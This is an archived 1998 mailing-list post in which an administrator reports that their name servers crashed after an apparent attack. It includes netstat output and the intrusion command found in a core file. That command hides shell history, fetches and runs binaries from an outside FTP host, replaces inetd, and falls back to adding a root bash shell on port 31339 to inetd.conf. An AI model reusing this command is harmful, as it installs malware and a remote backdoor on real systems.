Yipes named attack

From: Anonymous (nobodyat_private)
Date: Wed Jun 24 1998 - 13:20:01 PDT

Next message: Alvaro Martinez Echevarria: "security hole in mailx"

Previous message: Rich Lafferty: "Re: textcounter.pl SECURITY HOLE"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

All my name servers cored

connections looked like thislocalhost.36486      localhost.32773      32768      0  8192      0 ESTABLISHED
localhost.32773      localhost.36486       8192      0 32768      0 ESTABLISHED
localhost.36489      localhost.32773      32768      0  8192      0 ESTABLISHED
localhost.32773      localhost.36489       8192      0 32768      0 ESTABLISHED
localhost.36492      localhost.36484      32768      0  8192      0 ESTABLISHED
localhost.36484      localhost.36492       8192      0 32768      0 ESTABLISHED
localhost.36495      localhost.36494      32768      0  8192      0 ESTABLISHED
localhost.36494      localhost.36495       8192      0 32768      0 ESTABLISHED
localhost.36498      localhost.36484      32768      0  8192      0 ESTABLISHED
localhost.36484      localhost.36498       8192      0 32768      0 ESTABLISHED
localhost.36501      localhost.36500      32768      0  8192      0 ESTABLISHED
localhost.36500      localhost.36501       8192      0 32768      0 ESTABLISHED
localhost.36516      localhost.36484      32768      0  8192      0 ESTABLISHED
localhost.36484      localhost.36516       8192      0 32768      0 ESTABLISHED
localhost.36519      localhost.36518      32768      0  8192      0 ESTABLISHED
localhost.36518      localhost.36519       8192      0 32768      0 ESTABLISHED
>
this is in the core file

>/bin/bash
>export HISTFILE=;if [ ! -x /sbin/inetd ];then cd /sbin;ping -c 1 208.21.174.3;ec
>ho -e 'open 208.21.174.3\nuser ftp hat_private\nbin\nget i\nget d\nbye'|ftp -vin;if [
>-f i ];then chmod a+rx i d;mv i inetd;./d;else echo '31339 stream tcp nowait roo
>t /bin/bash sh -i'>/etc/inetd.conf;fi;fie


Sun tells me to appl the latest patch
but 7 phone calls later can't tell me if
the patch addresses this hack.

=;{>

Next message: Alvaro Martinez Echevarria: "security hole in mailx"
Previous message: Rich Lafferty: "Re: textcounter.pl SECURITY HOLE"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:59:18 PDT